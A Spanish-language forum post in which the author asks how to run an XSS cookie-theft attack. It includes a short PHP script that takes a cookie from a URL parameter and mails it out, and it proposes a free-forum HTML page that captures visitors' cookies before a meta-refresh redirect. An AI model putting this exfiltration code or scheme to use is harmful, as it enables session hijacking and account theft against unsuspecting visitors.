Autor
espero que alguien pueda sacarme la duda... Tengo entendido que se puede obtener el valor de una cookie remota y enviarlo por correo mediante php, hasta ahi todo bien: <?
php
$cookie = $_GET["cookie"];
mail("correo", "Asunto del msj", $cookie);
?>
Es posible que dicho código se ejecute automáticamente al ingresar a una web? (como si fuera un script o algo asi... hablo internamente osea en el propio código html, sin llamar archivos externos)... y al pulsar un botón?Entiendo que PHP se ejecuta del lado del servidor y HTML del lado del cliente, por eso la duda, leí que esto era posible mediante AJAX o algo por el estilo, alguna idea?
Por otro lado: No entiendo el porqué del "<script>alert()</script>" ni de ciertas partes del proceso, que el objetivo de un ataque XSS no es que el usuario ingrese y ejecute un cierto código para capturar y enviar la cookie a un tercero? Entonces yo podría crear una página en formato html en un foro (foroactivo por ej. permite crear páginas html que se ejecuten antes del foro) y colocar el código alli... el usuario entra, ejecuta el código y se lo redirecciona a otro foro cualquiera mediante la instrucción:
<META http-equiv=Refresh content='0;URL=www.loquesea.com'>
es decir que el usuario nunca ingresa al foro original sino que ve la html creada, se capturan las cookies y se lo redirecciona, obiamente podría crearla si yo soy el propietario del foro pero como crear uno allí es gratuito y libre para todos, es cuestión de segundos. La idea es usar XSS sin tener que estar subiendo archivos o enviando links sospechosos, solo el link de un foro propio y un poco de programación web...
es posible atacar así?
Si estas dos cosas se pudieran hacer sería muy sencillo un XSS no?
No se si se entendió mi idea XD
Saludos y gracias
En línea
